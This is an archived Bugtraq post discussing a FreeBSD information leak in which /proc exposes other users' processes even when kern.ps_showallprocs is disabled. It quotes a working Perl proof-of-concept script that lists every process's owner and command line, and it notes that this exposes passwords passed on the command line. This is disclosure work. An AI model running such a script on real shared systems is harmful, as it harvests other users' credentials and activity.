Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: ps information leak in FreeBSD

From: Jez Hancock <jez.hancock () munk nu>
Date: Tue, 7 Jan 2003 09:18:00 +0000
On Sun, Jan 05, 2003 at 08:46:50PM +0000, Cache wrote:

This is a little information leak. This bug(?) is not dangerous, but
normal user can see all process on the box using ex. /bin/ps;

This topic was addressed on freebsd-security list a while back, where
someone also noted that all user process information can be obtained
by regular users even with the sysctl flag 'kern.ps_showallprocs' set simply
by looking at the contents of /proc.  The following script was also
posted by someone to demonstrate this:

#!/usr/bin/perl
#
# hhp-sap_evade.pl ([s]how[a]ll[p]rocs) 02/03/2002
# author: JohnnyB
#
# a very basic tool that breaches the FreeBSD sysctl kern.ps_showallprocs=0
# option; an option that hides other users process information.
# (why would they implement such a broken and easily evaded option?)
# [and no this didnt take any skill.  its basically an output format]
#
# Tested on FreeBSD 4.5-RC.

print "[USER]      [GROUP]     [PID]   [FILE/ARGS]\n";
opendir(DIR,"/proc");
@procs=readdir(DIR);
closedir(DIR);
foreach ${proc} (@procs){
 if(${proc}=~/[0-9]/o){
  unshift(@pids, ${proc});
 }
}
foreach $pid (@pids){
 open(FD, "ls -al /proc/$pid/file|");
 while(<FD>){
  chomp;
  ${l}=$_;
  ${l}=~s/\s{1,}/ /g;
  if(${l}=~/.*? 1 (\S+) (\S+) .*?\/proc\/${pid}\/file -> (\S+)/){
   &ppid(${1},${2},${pid},${3});
  }
 }
 close(FD);
}
exit(0);

sub ppid(){
 (${a},${b},${c},${d})=@_;
 undef(${str});
 undef(${line});
 if(-e "/proc/$c/cmdline"){
  open(heh,"cat /proc/$c/cmdline|");
  @hah=<heh>;
  @chars=split(//,@hah[0]);
  foreach ${chr} (@chars){
   if(${chr}=~/[^a-zA-Z0-9\-_=\.\/\@\(\):\$#!&\*\+\|\"\'\;\[\]<>\?~`\^]/o){
    ${str}.=" ";
   }else{
    ${str}.=${chr};
   }
  }
  ${line}.=${a};
  while(length(${line})<11){${line}.=" ";} #alignment...
  ${line}.=" ".${b};
  while(length(${line})<23){${line}.=" ";}
  ${line}.=" ".${c};
  while(length(${line})<31){${line}.=" ";}
  chop(${str});
  if(${d}eq"unknown"){
   ${str}=~s/\s{1,}//g;
   ${line}.=" ("."${str}".")";
  }else{
   ${line}.=" "."${str}";
  }
  @line=split(//,${line});
  if(length(${line})>80){
   ${cntr}=0;
   foreach ${char} (@line){
    if((${cntr}==80)||(${cntr}==128)||(${cntr}==176)||(${cntr}==234)){
     print "\n"." "x32;          #^Anything >, deal with the rollover.
    }
    print "${char}";
    ${cntr}++;
   }
   print "\n";
  }
  else{
   print "${line}\n";
  }
  return(0);
 }
}

I believe someone (last poster in this thread?) also posted a patch on the same
list, freebsd-security.

It's annoying in that I see a lot of users running mysql with the -u and -p options:

mysql -u user -p mypassword

on the commandline, thinking that this info will not show up in ps listings when ps
is run by other users.  Ho hum...

Regards,

Jez Hancock
Previous By Date Next
Previous By Thread Next

Current thread: